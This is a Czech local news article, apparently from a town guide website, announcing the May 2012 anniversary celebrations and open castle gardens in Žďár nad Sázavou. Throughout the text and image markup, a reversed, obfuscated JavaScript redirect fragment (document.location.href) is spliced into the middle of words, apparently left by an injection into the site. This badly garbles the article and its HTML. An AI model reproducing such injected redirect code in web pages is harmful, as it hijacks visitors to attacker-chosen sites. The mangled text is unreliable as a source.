Žďár nad Sázavou, zdar nad sazavou, aktuality, zahrady, zámecké
Rainbow page separator

Zámecké zahrady se opět otevřou veřejnosti

Čtvrtek, 10. května 2012

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie-z-mikrokopteru-dajc.jpg“>bazillika-zamek-zdar-letecka-fo<span style=[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie-z-mikrokopteru-dajc“ src=“https://www.zdarskypruvodce.cz/zpo/uploads/uploads/bazillika-zamek-zdar-letecka-fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie-z-mikrokopteru-dajc-300×199.jpg“ width=“300″ height=“199″ />Žďár nad Sázavou/ V rámci oslav 760. výročí založení žďárského cisterciáckého kláštera je pro veřejnost připraven bohatý kulturní program. Ten proběhne od pátku 25. do neděle 27. května 2012. Jeho součástí bude kromě jiného i velmi oblíbená akce „Otevřené zahrady“. Díky ní se budou moci zájemci podívat tam, kam se běžně nedostanou – tedy do zahrad a sadů v okolí žďárského zámku. Oslavy pořádá měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to Žďár nad Sázavou společně s Informačním turistickým centrem ŽĎAS, společností Kinský Žďár a farností Žďár nad Sázavou II.

Program začíná v pátek 25. května, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v bazilice Nanebevzetí Panny Marie od čtvrt na šest večer mší sva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou pro děti. Od šesti hodin bude následovat komen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaná prohlídka nejstarších dochovaných částí kláštera a od sedmi hodin pak začíná kulturně společenské setkání v konventu, kde se bude hovořit o církevních řádech a jejich tradici.

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie-z-mikrokopteru-dajc.jpg“>zamek-zdar-letecka-fo<span style=[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie-z-mikrokopteru-dajc“ src=“https://www.zdarskypruvodce.cz/zpo/uploads/uploads/zamek-zdar-letecka-fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie-z-mikrokopteru-dajc-300×199.jpg“ width=“300″ height=“199″ />Zlatý hřeb programu, na nějž se těší pravděpodobně nejvíce obyvatel města, je samotná akce „Otevřené zahrady“. Jejich brány se veřejnosti otevřou v sobotu 26. května od třinácti hodin. Lidé si po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom budou moci pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory prohlížet až do šesti hodin večer. Během dne na ně čeká také několik hudebních vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení. Den pak zakončí v osm hodin večer sva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];todušní vigilie v rajské zahradě kláštera. Rovněž v neděli 27. května mohou zájemci vyrazit do zámeckých zahrad. Kromě nich budou od jedenácti do osmnácti hodin přístupné i všechny expozice zámku. To vše zpestří opět hudební vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení a výstava fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografií ve farní galerii. Po celý víkend bude navíc připravena na prvním zámeckém nádvoří prezentace hospodářství Kinský Žďár a tamních dobrovolných hasičů. Vstupné na oslavy významného výročí kláštera bude dobrovolné. V případě nepřízně počasí se akce uskuteční v krytých pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách zámku. (zp)

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie-z-rc-mikrokopteru/“>Letecká fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie z RC mikrokopteru